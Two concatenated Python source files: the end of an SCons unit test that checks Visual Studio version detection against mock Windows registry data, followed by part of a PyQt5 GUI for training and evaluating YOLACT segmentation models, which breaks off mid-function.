"InstallDir"="C:\Program Files\Microsoft Visual Studio .NET 2003\Common7\IDE\"
"CLR Version"="v1.1.4322"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.1\InstalledProducts]
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.1\InstalledProducts\Smart Device Extensions]
"UseInterface"=dword:00000001
"VS7InstallDir"="C:\Program Files\Microsoft Visual Studio .NET 2003\"
"VBDeviceInstallDir"="C:\Program Files\Microsoft Visual Studio .NET 2003\VB7\"
"CSharpDeviceInstallDir"="C:\Program Files\Microsoft Visual Studio .NET 2003\VC#\"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.1\InstalledProducts\Visual Basic.NET]
"UseInterface"=dword:00000001
"Package"="{164B10B9-B200-11D0-8C61-00A0C91E29D5}"
"DefaultProductAttribute"="VB"
@=""
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.1\InstalledProducts\Visual C#]
"DefaultProductAttribute"="C#"
"UseInterface"=dword:00000001
"Package"="{FAE04EC1-301F-11D3-BF4B-00C04F79EFBC}"
@=""
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.1\InstalledProducts\Visual JSharp]
@=""
"Package"="{E6FDF8B0-F3D1-11D4-8576-0002A516ECE8}"
"UseInterface"=dword:00000001
"DefaultProductAttribute"="Visual JSharp"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.1\InstalledProducts\VisualC++]
"UseInterface"=dword:00000001
"Package"="{F1C25864-3097-11D2-A5C5-00C04F7968B4}"
"DefaultProductAttribute"="VC"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.1\Setup]
"Dbghelp_path"="C:\Program Files\Microsoft Visual Studio .NET 2003\Common7\IDE\"
"dw_dir"="C:\Program Files\Microsoft Visual Studio .NET 2003\Common7\IDE\"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.1\Setup\CSDPROJ]
"ProductDir"="C:\Program Files\Microsoft Visual Studio .NET 2003\VC#\"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.1\Setup\JSHPROJ]
"ProductDir"="C:\Program Files\Microsoft Visual Studio .NET 2003\VJ#\"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.1\Setup\Servicing]
"CurrentSULevel"=dword:00000000
"CurrentSPLevel"=dword:00000000
"Server Path"=""
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.1\Setup\Servicing\Package]
"FxSDK"=""
"VB"=""
"VC"=""
"VCS"=""
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.1\Setup\Servicing\SKU]
"Visual Studio .NET Professional 2003 - English"="{20610409-CA18-41A6-9E21-A93AE82EE7C5}"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.1\Setup\VB]
"ProductDir"="C:\Program Files\Microsoft Visual Studio .NET 2003\Vb7\"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.1\Setup\VBDPROJ]
"ProductDir"="C:\Program Files\Microsoft Visual Studio .NET 2003\Vb7\"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.1\Setup\VC]
"ProductDir"="C:\Program Files\Microsoft Visual Studio .NET 2003\Vc7\"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.1\Setup\VC#]
"ProductDir"="C:\Program Files\Microsoft Visual Studio .NET 2003\VC#\"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.1\Setup\Visual Studio .NET Professional 2003 - English]
"InstallSuccess"=dword:00000001
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.1\Setup\VS]
"EnvironmentDirectory"="C:\Program Files\Microsoft Visual Studio .NET 2003\Common7\IDE\"
"EnvironmentPath"="C:\Program Files\Microsoft Visual Studio .NET 2003\Common7\IDE\devenv.exe"
"VS7EnvironmentLocation"="C:\Program Files\Microsoft Visual Studio .NET 2003\Common7\IDE\devenv.exe"
"MSMDir"="C:\Program Files\Common Files\Merge Modules\"
"VS7CommonBinDir"="C:\Program Files\Microsoft Visual Studio .NET 2003\Common7\Tools\"
"VS7CommonDir"="C:\Program Files\Microsoft Visual Studio .NET 2003\Common7\"
"ProductDir"="C:\Program Files\Microsoft Visual Studio .NET 2003\"
"VSUpdateDir"="C:\Program Files\Microsoft Visual Studio .NET 2003\Setup\VSUpdate\"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.1\Setup\VS\BuildNumber]
"1033"="7.1.3088"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.1\Setup\VS\Pro]
"ProductDir"="C:\Program Files\Microsoft Visual Studio .NET 2003\"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.1\VC]
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.1\VC\VC_OBJECTS_PLATFORM_INFO]
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.1\VC\VC_OBJECTS_PLATFORM_INFO\Win32]
@="{759354D0-6B42-4705-AFFB-56E34D2BC3D4}"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.1\VC\VC_OBJECTS_PLATFORM_INFO\Win32\Directories]
"Path Dirs"="$(VCInstallDir)bin;$(VSInstallDir)Common7\Tools\bin\prerelease;$(VSInstallDir)Common7\Tools\bin;$(VSInstallDir)Common7\tools;$(VSInstallDir)Common7\ide;C:\Program Files\HTML Help Workshop\;$(FrameworkSDKDir)bin;$(FrameworkDir)$(FrameworkVersion);C:\Perl\bin\;c:\bin;c:\cygwin\bin;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\Program Files\Common Files\Avid;C:\Program Files\backburner 2\;C:\Program Files\cvsnt;C:\Program Files\Subversion\bin;C:\Program Files\Common Files\Adobe\AGL;C:\Program Files\HTMLDoc"
"Library Dirs"="$(VCInstallDir)lib;$(VCInstallDir)atlmfc\lib;$(VCInstallDir)PlatformSDK\lib\prerelease;$(VCInstallDir)PlatformSDK\lib;$(FrameworkSDKDir)lib"
"Include Dirs"="$(VCInstallDir)include;$(VCInstallDir)atlmfc\include;$(VCInstallDir)PlatformSDK\include\prerelease;$(VCInstallDir)PlatformSDK\include;$(FrameworkSDKDir)include"
"Source Dirs"="$(VCInstallDir)atlmfc\src\mfc;$(VCInstallDir)atlmfc\src\atl;$(VCInstallDir)crt\src"
"Reference Dirs"="$(FrameWorkDir)$(FrameWorkVersion)"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.1\VC\VC_OBJECTS_PLATFORM_INFO\Win32\ToolDefaultExtensionLists]
"VCCLCompilerTool"="*.cpp;*.cxx;*.cc;*.c"
"VCLinkerTool"="*.obj;*.res;*.lib;*.rsc"
"VCLibrarianTool"="*.obj;*.res;*.lib;*.rsc"
"VCMIDLTool"="*.idl;*.odl"
"VCCustomBuildTool"="*.bat"
"VCResourceCompilerTool"="*.rc"
"VCPreBuildEventTool"="*.bat"
"VCPreLinkEventTool"="*.bat"
"VCPostBuildEventTool"="*.bat"
"VCBscMakeTool"="*.sbr"
"VCNMakeTool"=""
"VCWebServiceProxyGeneratorTool"="*.discomap"
"VCWebDeploymentTool"=""
"VCALinkTool"="*.resources"
"VCManagedResourceCompilerTool"="*.resx"
"VCXMLDataGeneratorTool"="*.xsd"
"VCManagedWrapperGeneratorTool"=""
"VCAuxiliaryManagedWrapperGeneratorTool"=""
"VCPrimaryInteropTool"=""
''','\n')
regdata_8exp = string.split(r'''
[HKEY_LOCAL_MACHINE\Software\Microsoft\VCExpress\8.0]
"CLR Version"="v2.0.50727"
"ApplicationID"="VCExpress"
"SecurityAppID"="{741726F6-1EAE-4680-86A6-6085E8872CF8}"
"InstallDir"="C:\Program Files\Microsoft Visual Studio 8\Common7\IDE\"
"EnablePreloadCLR"=dword:00000001
"RestoreAppPath"=dword:00000001
[HKEY_LOCAL_MACHINE\Software\Microsoft\VCExpress\8.0\InstalledProducts]
[HKEY_LOCAL_MACHINE\Software\Microsoft\VCExpress\8.0\InstalledProducts\Microsoft Visual C++]
"UseInterface"=dword:00000001
"Package"="{F1C25864-3097-11D2-A5C5-00C04F7968B4}"
"DefaultProductAttribute"="VC"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VCExpress\8.0\Setup]
[HKEY_LOCAL_MACHINE\Software\Microsoft\VCExpress\8.0\Setup\VC]
"ProductDir"="C:\Program Files\Microsoft Visual Studio 8\VC\"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VCExpress\8.0\Setup\VS]
"ProductDir"="C:\Program Files\Microsoft Visual Studio 8\"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VCExpress\8.0\VC]
[HKEY_LOCAL_MACHINE\Software\Microsoft\VCExpress\8.0\VC\VC_OBJECTS_PLATFORM_INFO]
[HKEY_LOCAL_MACHINE\Software\Microsoft\VCExpress\8.0\VC\VC_OBJECTS_PLATFORM_INFO\Win32]
@="{72f11281-2429-11d7-8bf6-00b0d03daa06}"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VCExpress\8.0\VC\VC_OBJECTS_PLATFORM_INFO\Win32\ToolDefaultExtensionLists]
"VCCLCompilerTool"="*.cpp;*.cxx;*.cc;*.c"
"VCLinkerTool"="*.obj;*.res;*.lib;*.rsc;*.licenses"
"VCLibrarianTool"="*.obj;*.res;*.lib;*.rsc"
"VCMIDLTool"="*.idl;*.odl"
"VCCustomBuildTool"="*.bat"
"VCResourceCompilerTool"="*.rc"
"VCPreBuildEventTool"="*.bat"
"VCPreLinkEventTool"="*.bat"
"VCPostBuildEventTool"="*.bat"
"VCBscMakeTool"="*.sbr"
"VCFxCopTool"="*.dll;*.exe"
"VCNMakeTool"=""
"VCWebServiceProxyGeneratorTool"="*.discomap"
"VCWebDeploymentTool"=""
"VCALinkTool"="*.resources"
"VCManagedResourceCompilerTool"="*.resx"
"VCXMLDataGeneratorTool"="*.xsd"
"VCManifestTool"="*.manifest"
"VCXDCMakeTool"="*.xdc"
''','\n')
regdata_cv = string.split(r'''[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion]
"ProgramFilesDir"="C:\Program Files"
"CommonFilesDir"="C:\Program Files\Common Files"
"MediaPath"="C:\WINDOWS\Media"
''','\n')
regdata_none = []
class DummyEnv:
def __init__(self, dict=None):
if dict:
self.dict = dict
else:
self.dict = {}
def Dictionary(self, key = None):
if not key:
return self.dict
return self.dict[key]
def __setitem__(self,key,value):
self.dict[key] = value
def __getitem__(self,key):
return self.dict[key]
def has_key(self,name):
return self.dict.has_key(name)
class RegKey:
"""key class for storing an 'open' registry key"""
def __init__(self,key):
self.key = key
class RegNode:
"""node in the dummy registry"""
def __init__(self,name):
self.valdict = {}
self.keydict = {}
self.keyarray = []
self.valarray = []
self.name = name
def value(self,val):
if self.valdict.has_key(val):
return (self.valdict[val],1)
else:
raise SCons.Util.RegError
def addValue(self,name,val):
self.valdict[name] = val
self.valarray.append(name)
def valindex(self,index):
rv = None
try:
rv = (self.valarray[index],self.valdict[self.valarray[index]],1)
except KeyError:
raise SCons.Util.RegError
return rv
def key(self,key,sep = '\\'):
if key.find(sep) != -1:
keyname, subkeys = key.split(sep,1)
else:
keyname = key
subkeys = ""
try:
# recurse, and return the lowest level key node
if subkeys:
return self.keydict[keyname].key(subkeys)
else:
return self.keydict[keyname]
except KeyError:
raise SCons.Util.RegError
def addKey(self,name,sep = '\\'):
if string.find(name, sep) != -1:
keyname, subkeys = string.split(name, sep, 1)
else:
keyname = name
subkeys = ""
if not self.keydict.has_key(keyname):
self.keydict[keyname] = RegNode(keyname)
self.keyarray.append(keyname)
# recurse, and return the lowest level key node
if subkeys:
return self.keydict[keyname].addKey(subkeys)
else:
return self.keydict[keyname]
def keyindex(self,index):
return self.keydict[self.keyarray[index]]
def __str__(self):
return self._doStr()
def _doStr(self, indent = ''):
rv = ""
for value in self.valarray:
rv = rv + '%s"%s" = "%s"\n' % (indent, value, self.valdict[value])
for key in self.keyarray:
rv = rv + "%s%s: {\n"%(indent, key)
rv = rv + self.keydict[key]._doStr(indent + ' ')
rv = rv + indent + '}\n'
return rv
class DummyRegistry:
"""registry class for storing fake registry attributes"""
def __init__(self,data):
"""parse input data into the fake registry"""
self.root = RegNode('REGISTRY')
self.root.addKey('HKEY_LOCAL_MACHINE')
self.root.addKey('HKEY_CURRENT_USER')
self.root.addKey('HKEY_USERS')
self.root.addKey('HKEY_CLASSES_ROOT')
self.parse(data)
def parse(self, data):
parent = self.root
keymatch = re.compile('^\[(.*)\]$')
valmatch = re.compile('^(?:"(.*)"|[@])="(.*)"$')
for line in data:
m1 = keymatch.match(line)
if m1:
# add a key, set it to current parent
parent = self.root.addKey(m1.group(1))
else:
m2 = valmatch.match(line)
if m2:
parent.addValue(m2.group(1),m2.group(2))
def OpenKeyEx(self,root,key):
if root == SCons.Util.HKEY_CLASSES_ROOT:
mykey = 'HKEY_CLASSES_ROOT\\' + key
if root == SCons.Util.HKEY_USERS:
mykey = 'HKEY_USERS\\' + key
if root == SCons.Util.HKEY_CURRENT_USER:
mykey = 'HKEY_CURRENT_USER\\' + key
if root == SCons.Util.HKEY_LOCAL_MACHINE:
mykey = 'HKEY_LOCAL_MACHINE\\' + key
#print "Open Key",mykey
return self.root.key(mykey)
def DummyOpenKeyEx(root, key):
return registry.OpenKeyEx(root,key)
def DummyEnumKey(key, index):
rv = None
try:
rv = key.keyarray[index]
except IndexError:
raise SCons.Util.RegError
# print "Enum Key",key.name,"[",index,"] =>",rv
return rv
def DummyEnumValue(key, index):
rv = key.valindex(index)
# print "Enum Value",key.name,"[",index,"] =>",rv
return rv
def DummyQueryValue(key, value):
rv = key.value(value)
# print "Query Value",key.name+"\\"+value,"=>",rv
return rv
def DummyExists(path):
return 1
class msvsTestCase(unittest.TestCase):
def setUp(self):
global registry
registry = self.registry
def test_get_default_visual_studio_version(self):
"""Test retrieval of the default visual studio version"""
env = DummyEnv()
v1 = get_default_visualstudio_version(env)
assert env['MSVS_VERSION'] == self.default_version, env['MSVS_VERSION']
assert env['MSVS']['VERSION'] == self.default_version, env['MSVS']['VERSION']
assert v1 == self.default_version, v1
env = DummyEnv({'MSVS_VERSION':'7.0'})
v2 = get_default_visualstudio_version(env)
assert env['MSVS_VERSION'] == '7.0', env['MSVS_VERSION']
assert env['MSVS']['VERSION'] == '7.0', env['MSVS']['VERSION']
assert v2 == '7.0', v2
env = DummyEnv()
v3 = get_default_visualstudio_version(env)
if v3 == '7.1':
override = '7.0'
else:
override = '7.1'
env['MSVS_VERSION'] = override
v3 = get_default_visualstudio_version(env)
assert env['MSVS_VERSION'] == override, env['MSVS_VERSION']
assert env['MSVS']['VERSION'] == override, env['MSVS']['VERSION']
assert v3 == override, v3
def test_get_visual_studio_versions(self):
"""Test retrieval of the list of visual studio versions"""
v1 = get_visualstudio_versions()
assert not v1 or v1[0] == self.highest_version, v1
assert len(v1) == self.number_of_versions, v1
def test_get_msvs_install_dirs(self):
"""Test retrieval of the list of visual studio installed locations"""
v1 = get_msvs_install_dirs()
assert v1 == self.default_install_loc, v1
for key, loc in self.install_locs.items():
v2 = get_msvs_install_dirs(key)
assert v2 == loc, key + ': ' + str(v2)
class msvs6aTestCase(msvsTestCase):
"""Test MSVS 6 Registry"""
registry = DummyRegistry(regdata_6a + regdata_cv)
default_version = '6.0'
highest_version = '6.0'
number_of_versions = 1
install_locs = {
'6.0' : {'VSINSTALLDIR': 'C:\\Program Files\\Microsoft Visual Studio', 'VCINSTALLDIR': 'C:\\Program Files\\Microsoft Visual Studio\\VC98'},
'7.0' : {},
'7.1' : {},
'8.0' : {},
'8.0Exp' : {},
}
default_install_loc = install_locs['6.0']
class msvs6bTestCase(msvsTestCase):
"""Test Other MSVS 6 Registry"""
registry = DummyRegistry(regdata_6b + regdata_cv)
default_version = '6.0'
highest_version = '6.0'
number_of_versions = 1
install_locs = {
'6.0' : {'VSINSTALLDIR': 'C:\\VS6', 'VCINSTALLDIR': 'C:\\VS6\\VC98'},
'7.0' : {},
'7.1' : {},
'8.0' : {},
'8.0Exp' : {},
}
default_install_loc = install_locs['6.0']
class msvs6and7TestCase(msvsTestCase):
"""Test MSVS 6 & 7 Registry"""
registry = DummyRegistry(regdata_6b + regdata_7 + regdata_cv)
default_version = '7.0'
highest_version = '7.0'
number_of_versions = 2
install_locs = {
'6.0' : {'VSINSTALLDIR': 'C:\\VS6', 'VCINSTALLDIR': 'C:\\VS6\\VC98'},
'7.0' : {'VSINSTALLDIR': 'C:\\Program Files\\Microsoft Visual Studio .NET\\', 'VCINSTALLDIR': 'C:\\Program Files\\Microsoft Visual Studio .NET\\Vc7\\'},
'7.1' : {},
'8.0' : {},
'8.0Exp' : {},
}
default_install_loc = install_locs['7.0']
class msvs7TestCase(msvsTestCase):
"""Test MSVS 7 Registry"""
registry = DummyRegistry(regdata_7 + regdata_cv)
default_version = '7.0'
highest_version = '7.0'
number_of_versions = 1
install_locs = {
'6.0' : {'VSINSTALLDIR': 'C:\\Program Files\\Microsoft Visual Studio'},
'7.0' : {'VSINSTALLDIR': 'C:\\Program Files\\Microsoft Visual Studio .NET\\', 'VCINSTALLDIR': 'C:\\Program Files\\Microsoft Visual Studio .NET\\Vc7\\'},
'7.1' : {},
'8.0' : {},
'8.0Exp' : {},
}
default_install_loc = install_locs['7.0']
class msvs71TestCase(msvsTestCase):
"""Test MSVS 7.1 Registry"""
registry = DummyRegistry(regdata_7_1 + regdata_cv)
default_version = '7.1'
highest_version = '7.1'
number_of_versions = 1
install_locs = {
'6.0' : {'VSINSTALLDIR': 'C:\\Program Files\\Microsoft Visual Studio'},
'7.0' : {},
'7.1' : {'VSINSTALLDIR': 'C:\\Program Files\\Microsoft Visual Studio .NET 2003\\', 'VCINSTALLDIR': 'C:\\Program Files\\Microsoft Visual Studio .NET 2003\\Vc7\\'},
'8.0' : {},
'8.0Exp' : {},
}
default_install_loc = install_locs['7.1']
class msvs8ExpTestCase(msvsTestCase):
"""Test MSVS 8 Express Registry"""
registry = DummyRegistry(regdata_8exp + regdata_cv)
default_version = '8.0Exp'
highest_version = '8.0Exp'
number_of_versions = 1
install_locs = {
'6.0' : {'VSINSTALLDIR': 'C:\\Program Files\\Microsoft Visual Studio'},
'7.0' : {},
'7.1' : {},
'8.0' : {'VSINSTALLDIR': 'C:\\Program Files\\Microsoft Visual Studio 8\\', 'VCINSTALLDIR': 'C:\\Program Files\\Microsoft Visual Studio 8\\VC\\'},
'8.0Exp' : {'VSINSTALLDIR': 'C:\\Program Files\\Microsoft Visual Studio 8\\', 'VCINSTALLDIR': 'C:\\Program Files\\Microsoft Visual Studio 8\\VC\\'},
}
default_install_loc = install_locs['8.0Exp']
class msvsEmptyTestCase(msvsTestCase):
"""Test Empty Registry"""
registry = DummyRegistry(regdata_none)
default_version = '6.0'
highest_version = None
number_of_versions = 0
install_locs = {
'6.0' : {'VSINSTALLDIR': 'C:\\Program Files\\Microsoft Visual Studio'},
'7.0' : {},
'7.1' : {},
'8.0' : {},
'8.0Exp' : {},
}
default_install_loc = install_locs['8.0Exp']
if __name__ == "__main__":
# only makes sense to test this on win32
if sys.platform != 'win32':
sys.exit(0)
SCons.Util.RegOpenKeyEx = DummyOpenKeyEx
SCons.Util.RegEnumKey = DummyEnumKey
SCons.Util.RegEnumValue = DummyEnumValue
SCons.Util.RegQueryValueEx = DummyQueryValue
os.path.exists = DummyExists # make sure all files exist :-)
exit_val = 0
test_classes = [
msvs6aTestCase,
msvs6bTestCase,
msvs6and7TestCase,
msvs7TestCase,
msvs71TestCase,
msvs8ExpTestCase,
msvsEmptyTestCase,
]
for test_class in test_classes:
print test_class.__doc__
suite = unittest.makeSuite(test_class, 'test_')
if not unittest.TextTestRunner().run(suite).wasSuccessful():
exit_val = 1
sys.exit(exit_val)
|
import sys
import gui
from PyQt5 import QtWidgets, QtGui, QtCore
from PyQt5.QtGui import QPixmap, QImage, QDoubleValidator, QIntValidator
from PyQt5.QtWidgets import QApplication, QDialog
from PyQt5.QtCore import QThread, pyqtSignal, QEventLoop, QTimer
import os
import time
import eval as eval_script
import train as train_script
class MainDialog(QDialog):
def __init__(self, parent=None):
super(QDialog, self).__init__(parent)
self.ui = gui.Ui_Dialog()
self.ui.setupUi(self)
flag = QtCore.Qt.WindowSystemMenuHint | QtCore.Qt.WindowMinMaxButtonsHint | QtCore.Qt.WindowCloseButtonHint
self.setWindowFlags(flag)
self.setWindowState(QtCore.Qt.WindowMinimized)
self.setWindowTitle('YOLACT - GUI')
self.validationFile = str()
self.validationModel = str()
self.onlineFile = str()
self.onlineModel = str()
self.benchmarkModel = str()
self.trainConfig = 'yolact_base_config'
self.batchSize = '1'
self.validationScoreThreshold = 0.15
self.benchmarkNumImage = 1000
self.ui.pushButton_evaluate.setEnabled(False)
self.ui.pushButton_benchmark.setEnabled(False)
self.ui.radioButton_batchEvaluation.setChecked(False)
self.ui.pushButton_onlineTest.setEnabled(False)
float_validator = QDoubleValidator(float("-inf"), float("inf"), 2, self)
self.ui.lineEdit_scoreThreshold.setValidator(float_validator)
self.ui.lineEdit_onlineThreshold.setValidator(float_validator)
int_validator = QIntValidator(1, 10000, self)
self.ui.lineEdit_numImage.setValidator(int_validator)
int_validator = QIntValidator(0, 99, self)
self.ui.lineEdit_camIndex.setValidator(int_validator)
# Training
self.t = TrainingThread()
self.t.signalForText.connect(self.updateTextBrowser)
self.ui.pushButton_train.clicked.connect(self.triggerTraining)
sys.stdout = self.t
self.ui.lineEdit_batchSize.editingFinished.connect(self.updateBatchSize)
self.ui.lineEdit_batchSize.setValidator(int_validator)
self.ui.lineEdit_trainConfig.editingFinished.connect(self.updateTrainConfig)
# Benchmark
self.b = BenchmarkThread()
self.b.signalForText.connect(self.updateTextBrowser)
self.ui.pushButton_benchmark.clicked.connect(self.triggerBenchmark)
self.ui.pushButton_selectModel_2.clicked.connect(self.chooseBenchmarkModel)
sys.stdout = self.b
self.ui.lineEdit_numImage.editingFinished.connect(self.lineEditMoveSliderBenchmark)
self.ui.horizontalSlider_numImage.valueChanged.connect(self.sliderEditLineEditBenchmark)
# Evaluation
self.e = BenchmarkThread()
self.e.signalForText.connect(self.updateTextBrowser)
sys.stdout = self.e
self.ui.pushButton_selectImage.clicked.connect(self.chooseValidateFile)
self.ui.pushButton_selectModel.clicked.connect(self.chooseTrainedModel)
self.ui.pushButton_evaluate.clicked.connect(self.triggerEvaluation)
self.ui.lineEdit_scoreThreshold.editingFinished.connect(self.lineEditMoveSlider)
self.ui.horizontalSlider_scoreThreshold.valueChanged.connect(self.sliderEditLineEdit)
# Online Test
self.d = DisplayThread()
self.d.signalForDisplay.connect(self.displayImage)
self.ui.pushButton_onlineTest.clicked.connect(self.triggerOnlineTest)
self.ui.pushButton_onlineModel.clicked.connect(self.chooseOnlineModel)
self.ui.pushButton_onlineVideo.clicked.connect(self.chooseOnlineFile)
self.ui.lineEdit_onlineThreshold.editingFinished.connect(self.onlineThresholdLimit)
# Clear
self.ui.pushButton_reset.clicked.connect(self.resetWindow)
self.ui.pushButton_clearTerminal.clicked.connect(self.clearTerminal)
self.ui.pushButton_terminateThread.clicked.connect(self.terminateThread)
self.clearWindow()
def displayImage(self):
curr_path = os.getcwd()
res_path = curr_path + '/results/tmp_res.jpg'
width = self.ui.display.width()
height = self.ui.display.height()
img = QImage(res_path)
# It dose not work when scaling pixmap. Dont know why
pixmap = QPixmap.fromImage(img.scaled(width, height, QtCore.Qt.KeepAspectRatio, QtCore.Qt.SmoothTransformation))
self.ui.display.setPixmap(pixmap)
def terminateThread(self):
self.b.terminate()
self.t.terminate()
self.e.terminate()
self.d.terminate()
self.clearWindow()
def updateTextBrowser(self, text):
cursor = self.ui.textBrowser_terminal.textCursor()
cursor.movePosition(QtGui.QTextCursor.End)
cursor.insertText(text)
self.ui.textBrowser_terminal.setTextCursor(cursor)
self.ui.textBrowser_terminal.ensureCursorVisible()
def updateBatchSize(self):
num = self.ui.lineEdit_batchSize.text()
num = int(num)
self.batchSize = str(num)
def updateTrainConfig(self):
self.trainConfig = self.ui.lineEdit_trainConfig.text()
def triggerTraining(self):
# python train.py --config=yolact_base_config --batch_size=1
config = self.trainConfig
batch_size = self.batchSize
self.t = TrainingThread(config, batch_size)
self.t.start()
loop = QEventLoop()
QTimer.singleShot(2000, loop.quit)
loop.exec_()
def triggerBenchmark(self):
# print(self.benchmarkModel)
self.ui.pushButton_benchmark.setEnabled(False)
self.b = BenchmarkThread(self.benchmarkModel, self.benchmarkNumImage)
self.b.start()
loop = QEventLoop()
QTimer.singleShot(2000, loop.quit)
def triggerEvaluation(self):
image = self.validationFile
model = self.validationModel
score_threshold = self.validationScoreThreshold
# Setup Evaluation
if not self.ui.radioButton_batchEvaluation.isChecked():
eval_script.parse_args(['--trained_model=' + model, '--score_threshold=' + str(score_threshold),
'--top_k=20', '--image=' + image + ':results/tmp_res.jpg'])
eval_script.perform()
self.displayImage()
return
eval_script.parse_args(['--trained_model=' + model])
self.e = EvaluationThread()
self.e.start()
self.ui.pushButton_terminateThread.setEnabled(True)
loop = QEventLoop()
QTimer.singleShot(2000, loop.quit)
def chooseTrainedModel(self, FilePath):
model = QtWidgets.QFileDialog.getOpenFileName(self, "Select your model", "./weights")[0]
if model == '':
self.ui.pushButton_onlineModel.setText('Select model')
self.ui.pushButton_onlineTest.setEnabled(False)
return
pos = model.find('yolact-gui')
model = model[pos + 11:]
pos = len(model)
for ch in model[::-1]:
if ch == '/':
break
pos = pos - 1
post = str()
for ch in model[::-1]:
if ch == '.':
break
post += ch
if post != 'htp':
self.ui.display.setText('Selected file is not valid model file (.pth)!')
self.ui.pushButton_onlineTest.setEnabled(False)
return
self.ui.pushButton_selectModel.setText(model[pos:])
self.validationModel = model
if self.validationModel != '' and self.validationFile != '':
self.ui.pushButton_onlineTest.setEnabled(True)
def chooseOnlineModel(self, FilePath):
model = QtWidgets.QFileDialog.getOpenFileName(self, "Select your model", "./weights")[0]
if model == '':
self.ui.pushButton_onlineModel.setText('Select model')
self.ui.pushButton_onlineTest.setEnabled(False)
return
pos = model.find('yolact-gui')
model = model[pos + 11:]
pos = len(model)
for ch in model[::-1]:
if ch == '/':
break
pos = pos - 1
post = str()
for ch in model[::-1]:
if ch == '.':
break
post += ch
if post != 'htp':
self.ui.display.setText('Selected file is not valid model file (.pth)!')
self.ui.pushButton_onlineModel.setEnabled(False)
return
self.ui.pushButton_onlineModel.setText(model[pos:])
self.onlineModel = model
if self.onlineModel != '' and self.onlineFile != '':
self.ui.pushButton_onlineTest.setEnabled(True)
def chooseOnlineFile(self):
video = QtWidgets.QFileDialog.getOpenFileName(self, "Select your video", "./video")[0]
if video == '':
self.ui.pushButton_onlineVideo.setText('Select video')
self.ui.pushButton_onlineTest.setEnabled(False)
return
pos = video.find('yolact-gui')
video = video[pos + 11:]
pos = len(video)
for ch in video[::-1]:
if ch == '/':
break
pos = pos - 1
post = str()
for ch in video[::-1]:
if ch == '.':
break
post += ch
if post != '4pm':
self.ui.display.setText('Selected file is not a valid video (.mp4)!')
self.ui.pushButton_onlineTest.setEnabled(False)
return
self.ui.pushButton_onlineVideo.setText(video[pos:])
self.onlineFile = video
if self.onlineModel != '' and self.onlineFile != '':
self.ui.pushButton_onlineTest.setEnabled(True)
def chooseBenchmarkModel(self, FilePath):
model = QtWidgets.QFileDialog.getOpenFileName(self, "Select your model", "./weights")[0]
if model == '':
self.ui.pushButton_selectModel_2.setText('Select model')
self.ui.pushButton_benchmark.setEnabled(False)
return
pos = model.find('yolact-gui')
model = model[pos + 11:]
pos = len(model)
for ch in model[::-1]:
if ch == '/':
break
pos = pos - 1
post = str()
for ch in model[::-1]:
if ch == '.':
break
post += ch
if post != 'htp':
self.ui.display.setText('Selected file is not a valid model file (.pth)!')
self.ui.pushButton_benchmark.setEnabled(False)
return
self.ui.pushButton_selectModel_2.setText(model[pos:])
self.benchmarkModel = model
if self.benchmarkModel != '':
self.ui.pushButton_benchmark.setEnabled(True)
def chooseValidateFile(self, FilePath):
image = QtWidgets.QFileDialog.getOpenFileName(self, "Select your image", "./img")[0]
if image == '':
self.ui.pushButton_selectImage.setText('Select image')
self.ui.pushButton_evaluate.setEnabled(False)
return
pos = image.find('yolact-gui')
image = image[pos + 11:]
pos = len(image)
for ch in image[::-1]:
if ch == '/':
break
pos = pos - 1
post = str()
for ch in image[::-1]:
if ch == '.':
break
post += ch
if post != 'gpj' and post != 'gnp':
self.ui.display.setText('Selected file is not a valid image (.jpg or .png)!')
self.ui.pushButton_evaluate.setEnabled(False)
return
self.ui.pushButton_selectImage.setText(image[pos:])
self.validationFile = image
if self.validationModel != '' and self.validationFile != '':
self.ui.pushButton_evaluate.setEnabled(True)
def triggerOnlineTest(self):
'''
python eval.py --trained_model=weights/yolact_base_54_800000.pth --score_threshold=0.25 --top_k=15 --video_multiframe=4 --video=video/demo.mp4
'''
model = self.onlineModel
score_threshold = self.ui.lineEdit_onlineThreshold.text()
video_multiframe = 4
video = self.onlineFile # :results/tmp_video.mp4
if self.ui.radioButton_webcam.isChecked():
webcam = self.ui.lineEdit_camIndex.text()
eval_script.parse_args(['--trained_model=' + model, '--score_threshold=' + score_threshold,
'--top_k=15', '--video_multiframe=' + str(video_multiframe), '--video=' + webcam])
else:
eval_script.parse_args(['--trained_model=' + model, '--score_threshold=' + score_threshold,
'--top_k=15', '--video_multiframe=' + str(video_multiframe), '--video=' + video])
self.e = EvaluationThread()
self.e.start()
self.d.start()
self.ui.pushButton_terminateThread.setEnabled(True)
loop = QEventLoop()
